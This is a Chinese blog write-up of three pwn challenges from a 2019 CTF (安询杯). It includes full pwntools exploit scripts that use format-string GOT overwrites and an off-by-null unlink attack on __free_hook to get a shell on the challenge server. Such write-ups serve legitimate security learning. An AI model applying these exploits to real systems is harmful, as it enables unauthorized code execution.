avatar
文章
172
标签
51
分类
29
首页
归档
标签
分类
友链
关于
额外功能
咲夜南梦's 博客
首页
归档
标签
分类
友链
关于
额外功能
CTF-安询杯-19年12月
|CTF
阅读量:|评论数:

安询杯 PWN WP

前言:做项目做到凌晨3点,9点被拉起来打比赛可还行,然后竟然还续到了晚上9点,我飞仙了

0x1 fmt32 | SOLVED | working : 咲夜南梦

leak脚本用wiki的就好了,可以dump出文件

然后分析各个call的got对应的函数,主要是猜测,然后到libc库里掏一下,验证一下自己的猜测是否正确。然后找到正确的函数之后,通过修改got为one gadget来拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
##coding=utf8
from pwn import *
context.log_level = 'debug'
ip = "47.108.135.45"
port = 20023
sh = remote(ip, port)
lib = ELF("libc.so.6")
'''
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL
0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL
0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL
0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL
0x5f065 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL
0x5f066 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL
'''
sh.sendlineafter('me:',"%9$sA" + p32(0x804A014))
sh.recvuntil('Repeater:')
printf_got = u32(sh.recv(4))
libc = printf_got - 0x049020
system = libc + 0x03a940
free = libc + lib.symbols['free']
__free_hook = libc + lib.symbols['__free_hook']
sh.sendlineafter('me:',"%9$sA" + p32(0x804A014 + 4 * 5))
sh.recvuntil('Repeater:')
__libc_start_main = u32(sh.recv(4))
sh.sendlineafter('me:',"%9$sA" + p32(0x804A030))
sh.recvuntil('Repeater:')
sprintf = u32(sh.recv(4))
one_gadget = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
log.success("sprintf: " + hex(sprintf))
log.success("__libc_start_main: " + hex(__libc_start_main))
log.success("printf: " + hex(printf_got))
log.success("system: " + hex(system))
log.success("libc: " + hex(libc))
payload  ='aaaaa'
payload += fmtstr_payload(9,{0x804A014:one_gadget[0] + libc},write_size = "byte",numbwritten = 0xe)
sh.sendlineafter("me:",payload)
sh.interactive()

0x2 fmt64 | SOLVED | working : 咲夜南梦

nc过去发现数据和fmt32一样,所以猜测是同一个源码编译成两个程序,然后用上面那个脚本dump一下内存,然后ida分析一下,可以得到got地址,然后利用onegadget拿到shell就好了,思路和fmt32一样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
context.log_level = 'debug'
ip = "47.108.135.45"
port = 20023
sh = remote(ip, port)
lib = ELF("libc.so.6")
sprintf_got = 0x601058
payload = '%9$sAAAA' + p64(sprintf_got)
sh.sendlineafter(":",payload)
sprintf = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc = sprintf - lib.symbols['sprintf']
system = libc + lib.symbols['system']
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
system = libc + one_gadget[0]
payload = ''
payload += '%' + str((system % 0x10000) - 9) + 'c%12$hn'
payload += '%' + str(((system >> 16) % 0x10000) - (system % 0x10000)) + 'c%13$hn'
payload += '%12$s'
payload = payload.ljust(0x20,'\x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)
sh.sendlineafter(":",payload)
addr = u64(sh.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
sh.interactive()

0x3 heap | SOLVED | working : 咲夜南梦

典型的off by null+unlink,通过printf来实现pie leak和libc leak,然后unlink修改chunk_list为__free_hook,然后写入system和binsh,然后free一下即可拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("pwn1")
lib = 0
sh = 0
def pwn(ip,port,debug):
 global lib
 global sh
 if(debug == 1):
  sh = process("./pwn1")
  lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
 else:
  sh = remote(ip,port)
  lib = ELF("libc-2.23.so")
 pop_rdi_ret = elf.search(asm("pop rdi\nret")).next()
 pop_rsi_r15_ret = elf.search(asm("pop rsi\npop r15\nret")).next()
 def add(idx,size,content):
  sh.sendlineafter(":","1")
  sh.sendlineafter(":",str(idx))
  sh.sendlineafter(":",str(size))
  sh.sendlineafter(":",content)
 def edit(idx,content):
  sh.sendlineafter(":","4")
  sh.sendlineafter(":",str(idx))
  sh.sendlineafter(":",content)
 def free(idx):
  sh.sendlineafter(":","2")
  sh.sendlineafter(":",str(idx))
 chunk_list = 0x202060
 payload = '%14$pAA%2$pB'
 sh.sendlineafter(":",payload)
 sh.recvuntil("Hello, ")
 pie = int(sh.recvuntil("AA",True),16) - (0x55d7eaef1200 - 0x55d7eaef0000)
 libc = int(sh.recvuntil("B",True),16) - lib.symbols['__malloc_initialize_hook'] + 0x30
 __free_hook = libc + lib.symbols['__free_hook']
 system = libc + lib.symbols['system']
 add(0,0x88,'\x11' * 0x87)
 add(1,0xF8,'\x12' * 0xF7)
 add(2,0x18,'\x13' * 0x17)
 free(0)
 payload = p64(0) + p64(0x81) + p64(pie + chunk_list - 0x18) + p64(pie + chunk_list - 0x10)
 payload = payload.ljust(0x80,'\x00')
 payload += p64(0x80)
 add(0,0x88,payload)
 free(1)
 payload = p64(0) * 3 + p64(__free_hook - 8) + p64(0x100)
 payload += p64(__free_hook - 8) + p64(0x100)
 edit(0,payload)
 edit(0,'/bin/sh\x00' + p64(system))
 free(0)
 sh.interactive()
if __name__ == "__main__":
 pwn("47.108.135.45",20023,0)
文章作者: 咲夜南梦
文章链接: http://yoursite.com/2019/12/01/CTF-%E5%AE%89%E8%AF%A2%E6%9D%AF-19%E5%B9%B412%E6%9C%88/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 咲夜南梦's 博客
CTF
打赏
  • 微信
    微信
  • 支付宝
    支付宝
相关推荐
2020-04-30
ARM-常用汇编
2018-11-09
密码学-Blowfish加密算法
2020-04-22
C-Socket编程
2019-08-30
CTF-19年OPPO_OGeek_线上赛
2019-08-30
CTF-19年第五空间网络安全大赛线上赛
2019-08-26
CTF-19年网络与信息安全领域专项赛
评论